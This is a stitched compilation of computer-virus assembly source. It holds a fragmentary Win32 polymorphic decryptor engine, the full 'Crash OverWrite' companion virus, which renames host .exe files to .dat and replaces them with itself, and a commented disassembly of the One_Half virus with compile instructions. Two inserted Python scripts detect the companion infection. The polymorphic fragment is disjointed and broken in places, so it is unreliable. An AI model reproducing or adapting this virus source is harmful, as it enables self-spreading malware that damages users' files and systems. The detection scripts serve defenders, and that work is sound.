jae NoPESign
NoPESign:
stc ; set carry flag
ret
CheckMZSign:
cmp word ptr [esi], '[M'
jae NoPESign
clc
ret
ret
; ***************************************************************************
; ----------------[ Generate a pseudo-random Number ]------------------------
; ***************************************************************************
GetRand:
; generate a pseudo-random NR.
; based on some initial registers
push ecx ; and the Windows uptime (GetTickCount)
add ecx, eax
call dword ptr [ebp+XGetTickCount]
add eax, ecx
add eax, ecx
add eax, edx
add eax, edi
add eax, ebp
add eax, dword ptr [ebp+PolyLen]
add eax, dword ptr [ebp+LoopLen]
pop ecx
add eax, ecx
or eax, eax
jne GetOutRand
mov eax, 87654321h
inc eax
GetOutRand:
xor edx, edx ; clean edx ( needed to be able to divide later )
div ecx ; random number is in EAX,
; random number below ECX in EDX
ret
; ***************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
; ***************************************************************************
genPoly:
and dword ptr [ebp+PolyLen], 0h
push 10h
pop ecx
call GetRand ; get a random number to start
; and save it as the new key used for all files
call RandJunk
; we have 3 different ways to put
; the size in ecx and 3 different ways
; to get the starting offset in esi
push 2h ; divide by 2
pop ecx
call GetRand ; get a random number to decide what we do
; first
; we need these 2 values before we start the
; decryption loop !
; length of loop = 0
and dword ptr [ebp+LoopLen], 0
; now we choose the way we crypt this thing !
push 5h
pop ecx
call GetRand
mov dword ptr [ebp+CryptType], edx
jmp EndPolyCrypto
IncESI1:
dec edx
jnz IncESI2
jmp EndIncESI
jmp EndIncESI2
EndIncESI2:
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h
EndIncESI:
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h
call StoreLoopLen
jmp EndLoopType
jmp EndLoopType
LoopType3:
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
stosd
add dword ptr [ebp+LoopLen], 4h
mov al, 75h ; jne
stosb
add dword ptr [ebp+PolyLen], 3h
call StoreLoopLen
EndLoopType:
add dword ptr [ebp+PolyLen], 2h
mov eax, VirusSize ; calculate the new size for the virus
add eax, dword ptr [ebp+PolyLen]
mov dword ptr [ebp+VirLen], eax
ret
StoreLoopLen:
xor eax, eax ; calculate the size for the loop
mov ax, 100h
sub eax, dword ptr [ebp+LoopLen]
sub eax, 2h
stosb
ret
; ***************************************************************************
; --------------------------[ Insert Junk Code ]----------------------------
; ***************************************************************************
RandJunk: ; edi points to the place where they will be stored
; we will insert 1-8 junk instructions
push 7d ; each time this routine is called
pop ecx
call GetRand
xchg ecx, edx
inc ecx
push ecx
RandJunkLoop:
push ecx
push 8h
pop ecx
call GetRand ; get a random number from 0 to 7
xchg eax, edx
ret
OpcodeTable:
db 08Bh ; mov
db 033h ; xor
db 00Bh ; or
db 02Bh ; sub
db 003h ; add
db 023h ; and
db 013h ; adc
db 01Bh ; sbb
popad
ret
; ***************************************************************************
; -------------------------[ Get esi from stack ]----------------------------
; ***************************************************************************
GenerateESI:
; the first thing we do is to get the
; start of the encrypted code; this is simple,
; it is our return address, so we get it from
; stack
; there are 3 different ways we can do this
push 3h
pop ecx
call GetRand
dec edx ; which way do we use ?
jnz ESI2
ESI1:
lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction
movsw ; 3 bytes long
movsb
add dword ptr [ebp+PolyLen], 3h
ESI3:
push 5h
pop ecx
call GetRand
xchg eax, edx
cmp al, 1h ; if we got ecx, we use eax
jne ESI3b
xor eax, eax
ESI3b:
mov edx, eax
push edx ; save edx
add eax, 58h ; pop a register
stosb
EndESI:
ret
; ***************************************************************************
; --------------------------[ Move the size to ECX ]-------------------------
; ***************************************************************************
push 3h
pop ecx
call GetRand ; random Nr in edx
inc edx ; increase
jmp EndECX
jmp EndECX
ECX3:
push -1
pop ecx
call GetRand
mov eax, VirusSize
shl edx, 26d
shr edx, 26d
sub eax, edx
stosb
call StoShrEAX
add dword ptr [ebp+PolyLen], 11d
; ***************************************************************************
; -------------------[ Data which does not travel ]--------------------------
; ***************************************************************************
VirusEnd: ; ok, this data will travel, but will be generated
; new on each run
Reg1 db (?) ; here we save the registers we use for the junk
Reg2 db (?) ; code
XCheckSumMappedFile dd (?)
XRegOpenKeyExA dd (?)
XRegQueryValueExA dd (?)
XRegCloseKey dd (?)
Xsocket dd (?)
XWSACleanup dd (?)
XWSAStartup dd (?)
Xclosesocket dd (?)
Xsendto dd (?)
Xsetsockopt dd (?)
; Directories
windir db 7Fh dup (0) ; here we save the directories
curdir db 7Fh dup (0) ; we want to infect
EndBufferData:
; ***************************************************************************
; ------------------------[ That's all folks ]-------------------------------
; ***************************************************************************
end Virus
; comment *
;
; Name: Crash OverWrite :-)
; Coder: BeLiAL
;
; This is my first Win32 virus. It's only a
; companion virus but it does its work very
; well. It's perhaps coded a bit lame but
; I'm sure nobody will care. It infects the
; first file in the directory and renames
; the victim file to .dat. Perhaps I'll
; make it resident or infect more files...
; Greetings and thanx go out
; to Evul,Toro,Padisah and Wallo.
;
; BeLiAL
;*
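The header describes the whole infection scheme: the first .exe found is copied to a same-named .dat and replaced by a copy of the virus, and a file whose nFileSizeLow already equals 1000h (the code below compares against that value) is treated as already infected. The following Python is an added defensive example, not BeLiAL's code: it scans a directory for the companion pattern, treating an .exe with a same-stem .dat sibling that still starts with an MZ header as the decisive hit, and records two weaker indicators, an .exe of exactly 0x1000 bytes and the marker string from the virus's data section. The directory contents are constructed in a temporary folder.

```python
"""Spot the companion-infection pattern described above.

Added defensive example, not BeLiAL's code. For every .exe in a directory the
scan looks for a same-stem .dat that still carries an MZ header (the displaced
original) and records two weaker indicators: an .exe of exactly 0x1000 bytes
(the size the virus compares nFileSizeLow against) and the marker string from
the data section. Sample files are constructed in a temporary directory.
"""
import tempfile
from pathlib import Path

COMPANION_SIZE = 0x1000
MARKER = b"[Crash OverWrite] coded by BeLiAL"


def dat_sibling(exe: Path):
    """Same-stem .dat next to the .exe, matched case-insensitively (DOS-style names)."""
    stem = exe.stem.lower()
    for p in exe.parent.iterdir():
        if p.is_file() and p.stem.lower() == stem and p.suffix.lower() == ".dat":
            return p
    return None


def companion_indicators(exe: Path) -> list:
    """Indicators found for one .exe; the .dat-with-MZ one is the decisive hit."""
    reasons = []
    dat = dat_sibling(exe)
    if dat is not None:
        with dat.open("rb") as fh:
            if fh.read(2) == b"MZ":
                reasons.append("dat_sibling_has_mz_header")
    if exe.stat().st_size == COMPANION_SIZE:
        reasons.append("exe_size_is_0x1000")
    if MARKER in exe.read_bytes():
        reasons.append("marker_string_present")
    return reasons


def find_companion_pairs(directory: str) -> list:
    """[(exe_name, dat_name, reasons)] for each .exe whose .dat sibling is an executable."""
    hits = []
    for entry in sorted(Path(directory).iterdir()):
        if entry.is_file() and entry.suffix.lower() == ".exe":
            reasons = companion_indicators(entry)
            if "dat_sibling_has_mz_header" in reasons:
                hits.append((entry.name, dat_sibling(entry).name, reasons))
    return hits


def build_sample_dir() -> str:
    """Constructed directory: one infected pair, one harmless .exe/.dat pair, one lone .exe."""
    root = Path(tempfile.mkdtemp(prefix="companion_scan_"))
    infected = b"MZ" + MARKER
    (root / "CALC.EXE").write_bytes(infected + bytes(COMPANION_SIZE - len(infected)))
    (root / "CALC.DAT").write_bytes(b"MZ" + bytes(8000))     # displaced original
    (root / "NOTES.EXE").write_bytes(b"MZ" + bytes(6000))
    (root / "NOTES.DAT").write_bytes(b"just some notes\n")    # ordinary data file
    (root / "CLEAN.EXE").write_bytes(b"MZ" + bytes(3000))
    return str(root)


if __name__ == "__main__":
    for exe, dat, reasons in find_companion_pairs(build_sample_dir()):
        print(f"{exe} <-> {dat}: {', '.join(reasons)}")
```

Only the MZ-header test on the .dat sibling decides a hit: plenty of programs keep legitimate .dat files next to their executables, so the size and marker indicators are reported for context rather than used on their own.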
.386
.model flat
Locals
Jumps
.data
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
dd 0
db '[Crash OverWrite] coded by BeLiAL'
.code
start:
push offset FindFileData
push offset exefile
call FindFirstFileA
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je reanimate
mov eax,offset cFileName.FindFileData
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je reanimate
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess
ends
end start
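A defender-side check for the companion scheme in the listing above (an added example, not BeLiAL's code): the virus skips any .exe that is already exactly 0x1000 bytes, copies the host aside as <name>.dat and drops its own body, which carries the '[Crash OverWrite] coded by BeLiAL' string, under the host's name. The directory snapshot below is constructed in memory; `scan_directory` runs the same logic against a real path.

```python
"""Spot CrashOverwrite companion infections from the traits visible in the listing.

Added example (not from the zine): an infected .exe is a 4096-byte image that
contains the BeLiAL marker string, usually next to a .dat that still starts
with an MZ header (the parked original host).
"""
import os

MARKER = b'[Crash OverWrite] coded by BeLiAL'   # string stored in the virus body
COMPANION_SIZE = 0x1000                          # size the virus treats as "already infected"


def is_companion_image(data: bytes) -> bool:
    """True if a file image has the size and marker of the CrashOverwrite body."""
    return len(data) == COMPANION_SIZE and MARKER in data


def find_infections(listing: dict) -> list:
    """Return (infected_exe, parked_host_or_None) pairs from a {name: bytes} map.

    The body is reported whenever it is found; the host name is filled in only
    when a sibling .dat still carries an executable (MZ) header.
    """
    by_lower = {name.lower(): name for name in listing}
    found = []
    for lname, name in by_lower.items():
        if not lname.endswith('.exe') or not is_companion_image(listing[name]):
            continue
        dat = by_lower.get(lname[:-4] + '.dat')
        if dat is not None and listing[dat][:2] != b'MZ':
            dat = None
        found.append((name, dat))
    return sorted(found)


def restore_plan(pairs: list) -> list:
    """Describe, without performing it, how to undo each infection that still has
    its host: delete the companion .exe and rename the parked host back."""
    return [(f'delete {exe}', f'rename {dat} -> {exe}') for exe, dat in pairs if dat]


def scan_directory(path: str) -> list:
    """Apply find_infections to a real directory (reads every regular file)."""
    listing = {}
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, 'rb') as fh:
                listing[name] = fh.read()
    return find_infections(listing)


def _fake_image(size: int, payload: bytes = b'') -> bytes:
    """Constructed MZ-looking blob of the requested size for the demo."""
    body = b'MZ' + payload
    return body + b'\0' * (size - len(body))


# Constructed directory snapshot (not real samples).
SAMPLE_DIR = {
    'CALC.EXE': _fake_image(COMPANION_SIZE, MARKER),     # virus body under the host's name
    'CALC.DAT': _fake_image(9000),                       # parked original host
    'notepad.exe': _fake_image(9000),                    # untouched program
    'readme.exe': _fake_image(COMPANION_SIZE),           # right size but no marker
    'setup.exe': _fake_image(COMPANION_SIZE, MARKER),    # body with no host beside it
}

if __name__ == '__main__':
    hits = find_infections(SAMPLE_DIR)
    for exe, dat in hits:
        print(f'{exe}: companion body, host parked as {dat}')
    for steps in restore_plan(hits):
        print('  ', *steps, sep=' | ')
```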
; Virus One_Half
; Disassembly done by Ratter
; To Vyvojar: If ya're still living, could ya pls lemme know about it?
; I would be very happy if i could speak with you sometimes ...
; To otherz who are reading this: Pls lemme know if there's any bug in the code.
; Or just to say ya like this :)
; You can reach me on Undernet channel #virus, #3c or via email: ratter@atlas.cz
; Compile:
; tasm /t/m2 one_half.asm
; tlink /t one_half.obj
.486p
.487
org 100h
;
loc_0582:
;
p label near
p_ equ offset the_second_part - offset boot_start
p__ equ presun_rutiny + (p - buffer)
;
_mcb_ db 'Z' ; it'z last_block
dw 9F01h ; PSP
dw 0FFh ; 4096 bytez
db 3 dup(?) ; reserved
db 'COMMAND', 0 ; blockz_owner_name ...
;
exe_header dw 20CDh ; exe_signature
part_pag dw 501eh
page_cnt dw 09b4h
relo_cnt dw 0
hdr_size dw 21cdh
min_mem dw 1f58h
max_mem dw 0bac3h
relo_ss dw 03d0h
exe_sp dw 0efe8h
exe_flag db 00h ; checksum
db 0b4h
exe_ip dw 0100h
relo_cs dw 0FFF0h
tabl_off dw 0BA05h
;
decode_routine_table:
dw 0208h ; here'z the table
dw 0381h ; of offsetz, where are
dw 047ch ; the chunkz of code of
dw 01f5h ; decode_routine
dw 049bh
xor_offset dw 01b1h
dw 0168h
dw 056ch
dw 0539h
jnz_offset dw 0182h
;
beginning_ofs dw 07beh
;
overwritten_bytez:
db 06h, 83h, 05h, 00h, 00h, 2Eh
db 8Ch, 0Eh, 85h, 05h, 4Fh, 02h
db 00h, 2Eh,0A1h,0A3h, 05h, 26h
db 0C7h
db 'G.com <jmen'
db 0Bh, 26h, 3Ah, 47h, 21h,0BAh
db 4Ah, 05h, 0Fh
db '„_driveru>', 0Ah, 't'
db 0FFh,0C6h, 44h,0FFh, 00h,0B8h
db 03h, 4Bh,0BBh, 80h, 00h, 8Ah
db 0Ch, 0Ah,0C9h,0BAh, 68h, 04h
db 0Fh
db 'ys ...', 0Ah, 0Dh, '$'
db 17h
db 'instalovan'
db 02h,0EBh, 03h,0E9h, 43h, 02h
db 4Eh, 56h, 89h, 36h
;
;
hdr_size_ dw 10h
date_div dw 1Eh
page_size_ dw 200h
;
new_int_1ch:
push ax
push ds
push es
xor ax, ax
mov ds, ax
les ax, dword ptr ds:[21h * 4] ; gimme int_21h
mov cs:[old_int_21h - p__], ax ; store offset
mov ax, es ; gimme seg
cmp ax, 800h ; are we under 800h ?
ja short loc_0783
mov word ptr cs:[old_int_21h - p__ + 2], ax ; yope
; we've got dos_int_21h_seg
les ax, dword ptr cs:[old_int_1ch - p]; gimme old_int_1ch
mov ds:[1ch * 4], ax ; restore it back
mov word ptr ds:[1ch * 4 + 2], es
mov word ptr ds:[21h * 4], offset new_int_21h - p;and set up
mov word ptr ds:[21h * 4 + 2], cs ; my new_int_21h
loc_0783: ; nope
pop es
pop ds ; restore regz
pop ax ; and
db 0EAh ; jmp far ptr old_int_1ch
old_int_1ch dw 0FF53h, 0F000h
one_half endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz movez some routinez ...
sub_078B proc near
mov si, offset presun_rutiny - p
mov di, offset buffer - p
mov cx, offset f_read_ - offset presun_rutiny - 4
cld
rep movsb
retn
sub_078B endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz makez from cyl_number_in_si valid cx_reg
sub_0798 proc near
push ax
mov ax, si
mov ch, al
push cx
mov cl, 4
shl ah, cl
pop cx
mov al, 3Fh ; '?'
and dh, al
and cl, al
not al
push ax
and ah, al
or dh, ah
pop ax
shl ah, 1
shl ah, 1
and ah, al
or cl, ah
pop ax
retn
sub_0798 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz writez text if run_counter is even and it iz even day etc.
sub_07EC proc near
mov ah, 4 ; gimme CMOS date_&_time
int 1Ah
jc short loc_ret_0816
test dl, 3 ; day even etc. ?
jnz short loc_ret_0816
test word ptr ds:[run_counter - p], 1; run_counter is even
jnz short loc_ret_0816
mov cx, offset sub_07ec - offset text_; gimme text_length
mov si, offset text_ - p ; gimme text_offset
mov ah, 0Fh ; gimme cur_video_page_number
int 10h ; why ?
mov bl, 7
mov ah, 0Eh ; print char 2 cur_page ...
locloop_080D:
lodsb ; gimme byte
int 10h
loop locloop_080D ; and go on
loc_ret_0816:
retn ; and end ...
sub_07EC endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz int_21h_file_fc with a handle in bx
sub_0817 proc near
push bx
db 0bbh ; mov bx, ?
handle_ dw 0 ; gimme handle
int 21h ; call int_21h
pop bx
retn ; and end ...
sub_0817 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz callz int_13h
int_13h proc near
pushf
cli
db 9Ah ; call far ptr int_13h_addr
int_13h_addr dw 774h, 70h
retn
int_13h endp
pop si
pop dx
pop cx
loc_09C0:
jmp loc_0855 ; jmp 2 mem_install
loc_09C3:
mov cx, [bx+2] ; gimme boot_start
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
add si, 7 ; make valid cyl_number
mov [lowest_cyl - p][di], si ; store it
xchg si, ax
mov cx, [bx+6] ; gimme end cylinder
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
mov [max_cyl_number - p][di], si; store it
mov [mov_ax_? - p][di], si ; store it
add ax, si
shr ax, 1 ; div with 2
mov [one_half_cyl - p][di], ax; store one_half
pop si
pop dx
pop cx
mov ax, 307h
xchg bx, si
inc cx
mov [viruz_start_sec - p][bx], cx
call int_13h ; write viruz_ body
jc loc_09C0 ; (whole)
lea si, [boot_start - p][bx]; and now move boot
lea di, [buffer - p][bx]
push di
mov cx, offset the_second_part - offset boot_start
rep movsb
db 0b8h ; mov ax, ?
mov_ax_? dw 265h ; store starting_sector_
stosw ; _2_ crypt
mov ax, 301h ; write the new parition_table
pop bx
mov cx, 1
call int_13h
jc loc_09C0 ; error ?
loc_0A1D:
pop bx ; nope
loc_0A1E:
push cs ; dis is a renewal of parts
pop ds ; that were overwritten
push cs ; by decode routine
pop es
db 8Dh,0B7h ; lea si, cs:[overwritt...][bx]
dw offset overwritten_bytez - p
db 81h,0C3h ;add bx, offset decode_...
dw offset decode_routine_table - p
mov cx, 0Ah ; there'z 0ah_partz
locloop_0A2D:
mov di, [bx] ; gimme where_2_move_offset
push cx
mov cx, 0Ah ; every_part haz 0ah bytez
rep movsb
pop cx
inc bx ; go2 next_move_offset
inc bx
loop locloop_0A2D ; and go on
pop es
db 83h,0C3h ; add bx, 0 - (....)
db 0 - (offset beginning_ofs - offset exe_header)
mov di, es ; bx 2 exe_header_offset
add di, 10h ; count start_seg
add [bx+16h], di ; store relo_cs
add [bx+0Eh], di ; store relo_ss
cmp word ptr [bx+6], 0 ; what'bout relo_cnt ?
je short loc_0AB6 ; there'z any ?
mov ds, es:[2ch] ; yope; gimme environment_seg
xor si, si ; start at offset 00h
loc_0A56:
inc si
cmp word ptr [si], 0 ; eof formal_environment ?
jne loc_0A56
add si, 4 ; go2 prog_name
xchg dx, si
mov ax, 3D00h ; open prog_file
int 21h
jc short loc_0ADB ; error ?
push cs
pop ds
mov ds:[handle_ - p - 10h][bx], ax ; store handle_
mov dx, [bx+18h] ; gimme tabl_offset
mov ax, 4200h ; f_ptr 2 it
call sub_0817
push es ; store start_seg
xchg di, ax
loc_0A79:
push ax
lea dx, cs:[reloc_buffer - p - 10h][bx]
mov cx, [bx+6] ; gimme relo_cnt
cmp cx, (name_buffer + 34 - random_number) shr 2
jb short loc_0A8A ; 2 big ?
mov cx, (name_buffer + 34 - random_number) shr 2
; yope gimme max_relo_cnt_now
loc_0A8A:
sub [bx+6], cx ; sub it from relo_cnt
push cx
shl cx, 1 ; mul it with 4
shl cx, 1 ; (segment:offset)
mov ah, 3Fh ; read reloc_table
call sub_0817
jc short loc_0ADB ; error ?
pop cx
pop ax
xchg si, dx
locloop_0A9D:
add [si+2], ax ; make relo_seg
les di, dword ptr [si] ; gimme relo_addr
add es:[di], ax ; and add start_seg
add si, 4 ; go2 next entry
loop locloop_0A9D
; in : dx = max_number
; out : dx = random_number
random_number:
mov cs:[mov_si_? - p], si
push ax
push bx
push cx
push dx
db 0b9h ; mov cx, ?
mov_cx_? dw 0b0d4h
db 0bbh ; mov bx, ?
mov_bx_? dw 6210h
mov dx, 15Ah
mov ax, 4E35h
xchg si, ax
xchg dx, ax
test ax, ax
jz short loc_0AFC
mul bx
loc_0AFC:
jcxz short loc_0B03
xchg cx, ax
mul si
add ax, cx
loc_0B03:
xchg si, ax
mul bx
add dx, si
inc ax
adc dx, 0
mov cs:[mov_bx_? - p], ax
mov cs:[mov_cx_? - p], dx
mov ax, dx
pop cx
xor dx, dx
jcxz short loc_0B1E
div cx
loc_0B1E:
pop cx
pop bx
pop ax
pop si
push si
cmp byte ptr cs:[si], 0CCh ; there'z a breakpoint ?
loc_0B27:
je loc_0B27 ; if yope stay in loop
; (nice_try ...)
db 0beh ; mov si, ?
mov_si_? dw 5cbh
retn
sub_08D4 endp
;
unimportant_instr:
;
nop
stc
clc
sti
db 2Eh ; cs:
db 36h ; ss:
db 3Eh ; ds:
cld
std
cmc
;
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz movez unimportant_instr 2 buffer
; in : dx = how many :-)
sub_0B57 proc near
or dx, dx ; count is null ?
jz short loc_ret_0B71
push si
push cx ; push regz
push dx
mov cx, dx ; count 2 cx
locloop_0B60:
mov si, offset unimportant_instr - p
mov dx, 0Ah ; max_random 2 0ah (10 instr)
call random_number ; gimme random_number
add si, dx ; go2 instruction
movsb ; move it
loop locloop_0B60 ; and go on
pop dx
pop cx ; restore regz
pop si
loc_ret_0B71:
retn ; and end ...
sub_0B57 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; Diz putz be4 and after instruction unimportant_instructionz
; in : dx = how many u_instr
sub_0B72 proc near
mov ax, dx ; instr_count 2 ax
inc dx
call random_number ; gimme random_number
sub ax, dx ; sub cur_instr_count from
; instr_count
call sub_0B57 ; move unimportant_instr
xchg dx, ax
rep movsb ; move real_instruction
db 81h,0FBh ; cmp bx, offset jnz_offset - p
dw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)
jnz short loc_0B92
mov ax, ds:[xor_offset - p] ; gimme xor_offset
sub ax, di ; sub cur_instr_buffer_index
add ax, offset instr_buffer - p; add instr_buffer_back
sub ax, [bx] ; sub jnz_offset
dec di ; go2 disp8
stosb ; and store it
loc_0B92:
call sub_0B57 ; and now put some u_instr
; after real_instruction
retn ; and end ...
sub_0B72 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
; This sets rite ModR/M instructions ....
; There are two phases here:
; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg
; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg
; in : dl = random_number that depends on phase
; Just go through it and try to know what's happening here :)
sub_0BA4 proc near
loc_0BA4:
lodsw
xchg di, ax
mov al, dl
cmp si, offset i_?_i - p
jne short loc_0BB6
and al, 5
cmp al, 1
jne short loc_0BC6
mov al, 7
loc_0BB6:
cmp si, offset a_?_i - p
jne short loc_0BC6
mov cl, 3
shl al, cl
or [di], al
or al, 0C7h
jmp short loc_0BCA
loc_0BC6:
or [di], al
or al, 0F8h
loc_0BCA:
and [di], al
cmp si, offset m_i_? - p
je short loc_ret_0BDA
cmp si, offset sub_0BA4 - p
je short loc_ret_0BDA
jmp short loc_0BA4
loc_ret_0BDA:
retn
sub_0BA4 endp
;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
; SUBROUTINE
